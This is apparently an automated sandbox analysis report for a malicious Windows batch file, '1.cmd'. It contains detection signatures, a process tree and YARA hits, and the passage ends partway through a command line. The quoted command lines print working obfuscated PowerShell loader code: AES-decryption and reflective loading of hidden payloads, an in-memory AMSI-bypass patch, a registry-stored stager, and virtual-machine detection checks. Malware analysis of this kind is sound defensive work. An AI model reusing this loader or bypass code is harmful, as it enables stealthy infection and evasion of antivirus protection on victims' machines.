Windows Analysis Report
1.cmd

Overview

General Information

Sample name:1.cmd
Analysis ID:1525473
MD5:19fc666f7494d78a55d6b50a0252c214
SHA1:8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Execute Batch Script
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 2120 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 5924 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • WMIC.exe (PID: 5968 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 3808 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 2596 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = 
$tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 1284 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WerFault.exe (PID: 732 cmdline: C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 2088 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6008 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5216 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 1712 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 4192 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 4336 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • WMIC.exe (PID: 6808 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 6856 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • cmd.exe (PID: 4284 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 4828 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
              • WerFault.exe (PID: 412 cmdline: C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 3904 cmdline: C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • schtasks.exe (PID: 4556 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 2852 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 3804 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 6048 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char]
(103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$crUBwWNbWsKMjsxdFIT=aMvXsEUhmbVC @([String])([IntPtr]);$CpOqYoEODudajRwpdwKjEO=aMvXsEUhmbVC 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xRGvgkyzmYH=$SWnYXVUkgpflw.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$PWtaGkrbiCHSQK=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$wJqytHrusrDKQVuUA=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$CBvLQPx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invoke($Null,@([Object]$CBvLQPx,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+'a'+'nB'+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$GtTUGmXcNy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,4,[ref]$GtTUGmXcNy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SjReXwPFwLrQCguSY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,0x20,[ref]$GtTUGmXcNy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](45)+''+'s'+'t'+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 2844 cmdline: C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • WMIADAP.exe (PID: 5500 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • Conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 1284 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x2e561a:$b2: ::FromBase64String(
  • 0x2e5678:$b2: ::FromBase64String(
  • 0x35e0c7:$b2: ::FromBase64String(
  • 0x35f549:$b2: ::FromBase64String(
  • 0x379fe1:$b2: ::FromBase64String(
  • 0x37a03f:$b2: ::FromBase64String(
  • 0x37aad2:$b2: ::FromBase64String(
  • 0x37ab30:$b2: ::FromBase64String(
  • 0x4048b9:$b2: ::FromBase64String(
  • 0x404917:$b2: ::FromBase64String(
  • 0x2de4f2:$s1: -join
  • 0x46128e:$s1: -join
  • 0x46bc12:$s1: -join
  • 0x4784b7:$s1: -join
  • 0x48558c:$s1: -join
  • 0x48895e:$s1: -join
  • 0x489010:$s1: -join
  • 0x48ab01:$s1: -join
  • 0x48cd07:$s1: -join
  • 0x48d52e:$s1: -join
  • 0x48dd9e:$s1: -join
Process Memory Space: powershell.exe PID: 4828 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xf9c2:$b2: ::FromBase64String(
  • 0xfa20:$b2: ::FromBase64String(
  • 0x5d86d:$b2: ::FromBase64String(
  • 0x835c3:$b2: ::FromBase64String(
  • 0xcf15e:$b2: ::FromBase64String(
  • 0xcf1bc:$b2: ::FromBase64String(
  • 0x8bc3:$s1: -join
  • 0x955f1:$s1: -join
  • 0x97888:$s1: -join
  • 0x1eef:$s3: Reverse
  • 0xd5b5a:$s3: Reverse
  • 0x35f8:$s4: +=
  • 0x369a:$s4: +=
  • 0x6de2:$s4: +=
  • 0x8898:$s4: +=
  • 0x8aae:$s4: +=
  • 0x8ba5:$s4: +=
  • 0x91858:$s4: +=
  • 0x91877:$s4: +=
  • 0x918b2:$s4: +=
  • 0x918cf:$s4: +=

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression 